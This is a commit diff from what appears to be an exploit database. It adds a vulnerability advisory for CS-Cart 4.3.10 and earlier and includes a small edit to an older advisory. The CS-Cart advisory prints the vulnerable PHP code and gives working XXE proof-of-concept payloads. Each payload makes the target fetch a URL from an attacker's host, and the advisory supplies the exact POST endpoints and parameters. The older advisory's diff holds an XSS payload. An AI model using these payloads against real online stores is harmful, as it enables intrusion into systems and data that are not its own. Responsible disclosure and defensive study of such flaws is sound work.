8. Looking at the code, the field to specify the mysqldump command
"Mysqldump path or command" is also injectable, but I have not a PoC
for it.
--
Felipe Molina de la Torre (@felmoltor)

107
platforms/php/webapps/40770.txt Executable file
View file

@ -0,0 +1,107 @@
# Software : CS-Cart <= 4.3.10
# Vendor home : cs-cart.com
# Author : Ahmed Sultan (@0x4148)
# Home : 0x4148.com
# Email : 0x4148@gmail.com
# Tested on : apache on windoes with php 5.4.4 / apache on linux with php <5.2.17
From vendor site
CS-Cart is an impressive platform for users to any level of eCommerce
experience.
With loads of features at a great price, CS-Cart is a great shopping cart
solution that will quickly enable your online store to do business.
XXE I : Twimgo addon
app/addons/twigmo/Twigmo/Api/ApiData.php
Line 131
public static function parseDocument($data, $format =
TWG_DEFAULT_DATA_FORMAT)
{
if ($format == 'xml') {
$result = @simplexml_load_string($data, 'SimpleXMLElement',
LIBXML_NOCDATA);
return self::getObjectAsArray($result);
} elseif ($format == 'jsonp') {
return (array) json_decode($data, true);
} elseif ($format == 'json') {
return (array) json_decode($data, true);
}
return false;
}
POC
<?php
$xml="
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM 'http://YOUR_HOST/0x4148.jnk' >]>
<document>
<Author>Ahmed sultan (0x4148)</Author>
<killit>&xxe;</killit>
</document>
";
echo rawurlencode(base64_encode($xml));
?>
change YOUR_HOST to your server address , use the output in the following
POST request
Action -> HOST/cs-cart/index.php?dispatch=twigmo.post
Data -> action=add_to_cart&data=DATA_OUT_PUT_HERE&format=xml
a GET request will be sent to your webserver from the vulnerable host
indicating successful attack
(Require twimgo addon to be activated)
XXE II : Amazon payment
File : app/payments/amazon/amazon_callback.php
Line 16
use Tygh\Registry;
if (!defined('BOOTSTRAP')) { die('Access denied'); }
include_once (Registry::get('config.dir.payments') .
'amazon/amazon_func.php');
fn_define('AMAZON_ORDER_DATA', 'Z');
if (!empty($_POST['order-calculations-request'])) {
$xml_response = $_POST['order-calculations-request'];
} elseif (!empty($_POST['NotificationData'])) {
$xml_response = $_POST['NotificationData'];
}
if (!empty($_POST['order-calculations-error'])) {
// Process the Amazon callback error
$xml_error = $_POST['order-calculations-error'];
$xml = @simplexml_load_string($xml_error);
if (empty($xml)) {
$xml = @simplexml_load_string(stripslashes($xml_error));
}
// Get error message
$code = (string) $xml->OrderCalculationsErrorCode;
$message = (string) $xml->OrderCalculationsErrorMessage;
POC
sending POST request to
app/payments/amazon/amazon_checkout.php
setting POST parameter order-calculations-request to
<?xml version='1.0'?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://host/amazon.jnk" >]>
<document>
<Author>Ahmed sultan (0x4148)</Author>
<killit>%26xxe%3b</killit>
</document>
Will result in an GET request to your host from the vulnerable machine ,
indicating successful attack
(Require amazon payment method to be activated)
Disclosure time line
10/11 vulnerabilities reported to the vendor
11/11 Vendor asked for extra details
12/11 Vendor acknowledged the validity of vulnerabilities and asked for
time to fix
16/11 vendor permitted public release
Reference
https://0x4148.com/2016/11/10/cs-cart/

2
platforms/php/webapps/5309.txt
View file

@ -111,7 +111,7 @@ POST parameter "bolini_searchengine46Search".
Example: Example:
bolini_searchengine46Search = '><IMG SRC=javascript:alert(&quot;DSecRG&#x20;XSS&quot;)> bolini_searchengine46Search = '><IMG SRC=javascript:alert("DSecRG&#x20;XSS")>
-------------------------------------------------------------------- --------------------------------------------------------------------